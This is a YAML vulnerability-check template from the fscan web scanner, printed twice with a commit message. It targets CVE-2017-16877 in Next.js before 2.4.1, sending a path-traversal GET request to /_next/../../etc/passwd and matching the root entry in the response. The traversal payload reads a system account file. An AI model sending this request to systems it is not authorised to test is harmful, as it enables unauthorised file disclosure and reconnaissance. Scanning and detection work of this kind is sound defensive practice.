fscan/WebScan/pocs/nextjs-cve-2017-16877.yml

name: poc-yaml-nextjs-cve-2017-16877
rules:
  - method: GET
    path: /_next/../../../../../../../../../../etc/passwd
    follow_redirects: false
    expression: >
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
  version: <2.4.1
  author: Loneyer
  links:
    - https://github.com/Loneyers/vuldocker/tree/master/next.js
    - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
优化xray解析模块,支持groups、新增poc 2021-11-15 19:53:46 -08:00			`name: poc-yaml-nextjs-cve-2017-16877`
			`rules:`
			`- method: GET`
			`path: /_next/../../../../../../../../../../etc/passwd`
			`follow_redirects: false`
			`expression: >`
			`response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)`
			`detail:`
			`version: <2.4.1`
			`author: Loneyer`
			`links:`
			`- https://github.com/Loneyers/vuldocker/tree/master/next.js`
			`- https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9`